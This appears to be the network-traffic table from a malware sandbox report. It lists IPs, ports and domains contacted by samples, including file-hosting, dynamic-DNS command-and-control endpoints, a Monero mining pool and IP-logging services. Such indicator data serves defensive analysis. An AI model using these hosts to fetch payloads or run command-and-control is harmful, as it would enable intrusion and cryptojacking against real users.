| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HK | 34.92.57.107:80 | www.yf168vip.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| IT | 81.17.18.197:80 | www.stericyclehq.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 197.18.17.81.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| US | 8.8.8.8:53 | retghrtgwtrgtg.bounceme.net | udp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HK | 34.92.57.107:80 | www.yf168vip.com | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| IT | 81.17.18.197:80 | www.stericyclehq.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HK | 8.217.92.5:80 | www.gdyanjiu.icu | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| IT | 81.17.18.197:80 | www.stericyclehq.com | tcp |
| HK | 34.92.57.107:80 | www.yf168vip.com | tcp |
| RU | 91.215.85.63:7020 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| IT | 81.17.18.197:80 | www.stericyclehq.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | xmr-asia1.nanopool.org | udp |
| SG | 139.99.102.74:10343 | xmr-asia1.nanopool.org | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| IT | 81.17.18.197:80 | www.stericyclehq.com | tcp |
| US | 8.8.8.8:53 | 74.102.99.139.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 178.162.202.48:443 | datalake.abuse.ch | tcp |
| DE | 178.162.202.48:443 | datalake.abuse.ch | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | www.ljwixsb.top | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.ljwixsb.top | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| RU | 91.215.85.63:2718 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.mobdigim.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 136.243.92.92:80 | www.mobdigim.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 88.80.147.105:53 | ewixgdb.ua | udp |
| BG | 185.141.63.253:80 | ewixgdb.ua | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.finebb.net | udp |
| US | 8.8.8.8:53 | 105.147.80.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.63.141.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.63.141.185.in-addr.arpa | udp |
| RU | 91.215.85.63:8118 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.194.2.86:80 | www.finebb.net | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.yf168vip.com | udp |
| HK | 34.92.57.107:80 | www.yf168vip.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.248.169.48:80 | www.shortfall.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| US | 203.161.61.170:80 | www.tecverse.xyz | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 91.215.85.63:7020 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.shortfall.net | udp |
| US | 13.248.169.48:80 | www.shortfall.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | datastream.myvnc.com | udp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| TR | 185.83.146.204:80 | www.hreeremaeps.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 136.243.92.92:80 | www.mobdigim.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 153.141.79.40.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.77:22888 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 77.94.49.194.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.tecverse.xyz | udp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| US | 194.49.94.152:50500 | tcp | |
| US | 203.161.61.170:80 | www.tecverse.xyz | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | files.catbox.moe | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 188.114.96.0:443 | yip.su | tcp |
| US | 172.67.34.170:443 | pastebin.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| MY | 111.90.146.230:80 | tcp | |
| US | 8.8.8.8:53 | sl.himanfast.com | udp |
| US | 188.114.96.0:80 | sl.himanfast.com | tcp |
| US | 8.8.8.8:53 | gobo25cl.top | udp |
| US | 8.8.8.8:53 | thecrazymonkey.org | udp |
| US | 104.21.92.178:80 | gobo25cl.top | tcp |
| US | 104.21.92.178:443 | gobo25cl.top | tcp |
| US | 8.8.8.8:53 | redirector.pm | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 208.91.197.132:80 | www.shopbons-mall.com | tcp |
| US | 194.49.94.85:443 | redirector.pm | tcp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| NL | 185.26.182.112:80 | net.geo.opera.com | tcp |
| NL | 185.26.182.112:443 | net.geo.opera.com | tcp |
| BG | 91.92.243.139:80 | 91.92.243.139 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 178.92.21.104.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 172.67.34.170:443 | pastebin.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | flyawayaero.net | udp |
| US | 104.21.92.178:80 | gobo25cl.top | tcp |
| US | 104.21.92.178:443 | gobo25cl.top | tcp |
| US | 194.49.94.85:443 | redirector.pm | tcp |
| US | 172.67.216.81:443 | flyawayaero.net | tcp |
| US | 8.8.8.8:53 | potatogoose.com | udp |
| NL | 185.26.182.112:80 | net.geo.opera.com | tcp |
| NL | 185.26.182.112:443 | net.geo.opera.com | tcp |
| US | 8.8.8.8:53 | northmuyaspropertyinvestment.com | udp |
| US | 104.21.35.235:443 | potatogoose.com | tcp |
| BG | 91.92.243.139:80 | 91.92.243.139 | tcp |
| TR | 78.135.105.12:443 | northmuyaspropertyinvestment.com | tcp |
| US | 194.49.94.152:50500 | tcp | |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | 235.35.21.104.in-addr.arpa | udp |
| US | 188.114.97.0:80 | sl.himanfast.com | tcp |
| US | 188.114.96.0:443 | sl.himanfast.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 12.105.135.78.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 44.198.246.147:587 | mail.pharmapanel.com.ar | tcp |
| US | 8.8.8.8:53 | autoupdate.geo.opera.com | udp |
| US | 8.8.8.8:53 | www.hreeremaeps.com | udp |
| TR | 185.83.146.204:80 | www.hreeremaeps.com | tcp |
| NL | 185.26.182.123:443 | autoupdate.geo.opera.com | tcp |
| US | 8.8.8.8:53 | desktop-netinstaller-sub.osp.opera.software | udp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 8.8.8.8:53 | 147.246.198.44.in-addr.arpa | udp |
| US | 172.67.194.188:443 | iplogger.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | download.opera.com | udp |
| US | 8.8.8.8:53 | 188.194.67.172.in-addr.arpa | udp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.shopbons-mall.com | udp |
| US | 194.49.94.152:50500 | tcp | |
| US | 208.91.197.132:80 | www.shopbons-mall.com | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| BG | 185.141.63.253:80 | ewixgdb.ua | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | desktop-netinstaller-sub.osp.opera.software | udp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| NL | 185.26.182.123:443 | autoupdate.geo.opera.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 185.26.182.122:443 | download.opera.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 122.182.26.185.in-addr.arpa | udp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | tcp | |
| US | 34.120.175.65:80 | www.333vvs.com | tcp |
| US | 8.8.8.8:53 | center.onthewifi.com | udp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| DE | 195.201.255.35:443 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| DE | 195.201.255.35:443 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.113:80 | 194.49.94.113 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 104.26.9.59:443 | api.myip.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 113.94.49.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.9.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.nnxh.net | udp |
| HK | 154.216.129.246:80 | www.nnxh.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | vk.com | udp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| US | 8.8.8.8:53 | 246.129.216.154.in-addr.arpa | udp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:443 | vk.com | tcp |
| DE | 195.201.255.35:443 | tcp | |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 78.132.240.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.pdian.link | udp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 194.49.94.152:50500 | tcp | |
| N/A | 127.0.0.1:30 | icmp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | tcp | |
| HK | 8.217.92.5:80 | www.gdyanjiu.icu | tcp |
| DE | 195.201.255.35:443 | tcp | |
| DE | 195.201.255.35:443 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.antsnav.com | udp |
| US | 188.114.96.0:80 | www.antsnav.com | tcp |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | tcp | |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| US | 8.8.8.8:53 | retghrtgwtrgtg.bounceme.net | udp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| DE | 195.201.255.35:443 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.rubesste.com | udp |
| US | 167.172.228.26:80 | www.rubesste.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | 26.228.172.167.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.click | udp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| RU | 185.172.128.100:80 | 185.172.128.100 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | www.onlygiftkits.com | udp |
| CA | 23.227.38.74:80 | www.onlygiftkits.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 74.38.227.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.cmmug.asia | udp |
| US | 188.114.96.9:80 | www.cmmug.asia | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 9.96.114.188.in-addr.arpa | udp |
| US | 194.49.94.152:50500 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.194.2.86:80 | www.finebb.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 3.80.150.121:443 | service-domain.xyz | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HK | 8.217.92.5:80 | www.gdyanjiu.icu | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 202.23.217.172.in-addr.arpa | udp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.irmaosconstrusilva.store | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 162.240.81.18:80 | www.irmaosconstrusilva.store | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | gservicese.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | gservicese.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.a0zu3im002.cfd | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.ricohdealers.com | udp |
| US | 216.244.107.100:80 | www.ricohdealers.com | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.stericyclehq.com | udp |
| US | 8.8.8.8:53 | t.me | udp |
| US | 63.141.242.46:80 | www.stericyclehq.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 100.107.244.216.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| BG | 185.141.63.253:80 | ewixgdb.ua | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.ljwixsb.top | udp |
| DE | 195.201.255.35:443 | tcp | |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | tcp | |
| BG | 91.92.243.151:80 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | tcp | |
| DE | 195.201.255.35:443 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | center.onthewifi.com | udp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| TR | 185.216.70.235:80 | 185.216.70.235 | tcp |
| DE | 195.201.255.35:443 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
